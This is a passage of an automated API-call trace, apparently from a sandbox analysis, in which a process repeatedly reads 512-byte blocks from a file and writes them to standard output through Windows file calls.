lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, 
lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] GetFileType (hFile=0x4c) returned 0x1 [0127.138] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.138] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.138] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.138] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.139] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.139] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.139] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.140] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.140] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0127.140] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.140] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.140] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] 
GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.141] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.141] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | 
out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.141] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.141] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, 
lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] GetFileType (hFile=0x4c) returned 0x1 [0127.142] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.142] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.142] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.142] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.143] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] GetFileType (hFile=0x4c) returned 0x1 [0127.143] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.143] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.144] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) 
returned 1 [0127.144] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.144] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.144] GetFileType (hFile=0x4c) returned 0x1 [0127.144] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.145] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.145] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.145] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.145] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, 
lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] GetFileType (hFile=0x4c) returned 0x1 [0127.146] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.146] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cefb8*, lpNumberOfBytesWritten=0x1cdfbc*=0x20, lpOverlapped=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.146] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdfa8 | out: lpNewFilePointer=0x0) returned 1 [0127.146] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.147] ReadFile (in: hFile=0x54, lpBuffer=0x1cedd8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdfc8, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesRead=0x1cdfc8*=0x200, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cedd8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee28*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cee78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cee78*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1ceec8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1ceec8*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef18*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef18*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] GetFileType (hFile=0x4c) returned 0x1 [0127.147] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.147] WriteFile (in: hFile=0x4c, lpBuffer=0x1cef68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdfbc, lpOverlapped=0x0 | out: lpBuffer=0x1cef68*, lpNumberOfBytesWritten=0x1cdfbc*=0x50, lpOverlapped=0x0) returned 1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] GetFileType (hFile=0x4c) returned 0x1 [0127.148] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.148] WriteFile (in: hFile=0x4c, lpBuffer=0x1cefb8*, 